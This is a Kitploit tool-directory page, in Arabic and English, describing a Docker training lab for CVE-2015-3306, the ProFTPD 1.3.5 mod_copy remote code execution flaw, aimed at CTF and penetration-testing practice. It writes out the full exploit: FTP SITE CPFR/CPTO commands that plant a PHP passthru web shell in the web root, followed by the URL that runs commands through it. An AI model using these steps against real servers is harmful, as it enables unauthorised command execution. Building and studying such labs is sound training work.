Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE إعداد مختبر منزلي (Docker) سهل الاستخدام لـ Red Teaming أو Penetration Testing | Kitploit
أدوات/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE إعداد مختبر منزلي (Docker) سهل الاستخدام لـ Red Teaming أو Penetration Testing

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإنجليزية أدناه

ProFTPD 1.3.5 (mod_copy) — معمل محاكاة RCE

CVE20153306

تم تصميم هذا المعمل لمحاكاة الثغرة CVE-2015-3306 — ProFTPD mod_copy نسخ الملفات عن بُعد إلى تنفيذ الأوامر عن بُعد (RCE)
يُستخدم للتعلم على Web Shell Injection RCE عبر وحدة mod_copy الخاصة بـ ProFTPD.


الميزات

  • ProFTPD 1.3.5 ثغري (قابل للاستغلال)
  • تفعيل كامل لوحدة mod_copy (SITE CPFR / SITE CPTO)
  • دعم دخول FTP مجهول (Anonymous FTP)
  • Apache2 + PHP5 لمحاكاة جذر الويب /var/www/html
  • يمكن للمهاجم استخدام SITE CPFR/CPTO لنسخ ملف إلى جذر الويب من أجل تشغيل RCE
  • النظام يُنشئ flag_RANDOM.txt تلقائيًا في كل مرة يبدأ فيها الحاوية (container)
  • هذا معمل مخصص لـ CTF / فريق الاختراق / تدريب اختبار الاختراق

هيكل الدليل

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

الاستخدام (تشغيل الحاوية)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

طريقة اختبار الثغرة CVE-2015-3306

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

الوصول عبر الويب:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

العلم (Flag)

يُحفظ في:

root@kitploit:~
/tmp/flag_RANDOM.txt

النسخة الإنجليزية — معمل ProFTPD 1.3.5 (mod_copy) RCE

يحاكي هذا المعمل CVE-2015-3306 باستخدام ProFTPD 1.3.5 مع mod_copy، مما يسمح للمهاجمين بتنفيذ ProFTPD mod_copy نسخ الملفات عن بُعد إلى RCE.


الميزات

  • ProFTPD 1.3.5 ثغري مُجمّع من المصدر
  • تفعيل mod_copy (SITE CPFR + SITE CPTO)
  • دخول FTP مجهول
  • Apache2 + PHP5 لتنفيذ الـ webshell
  • إنشاء تلقائي لـ flag_RANDOM.txt عند بدء الحاوية
  • مثالي لـ CTF والتعليم وبحوث الاستغلال

مثال اختبار الاستغلال

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

ثم نفذ:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

موقع العلم

root@kitploit:~
/tmp/flag_RANDOM.txt

إخلاء مسؤولية

للاستخدام التعليمي واختبار الاختراق المصرح به فقط.

تنزيل الأداة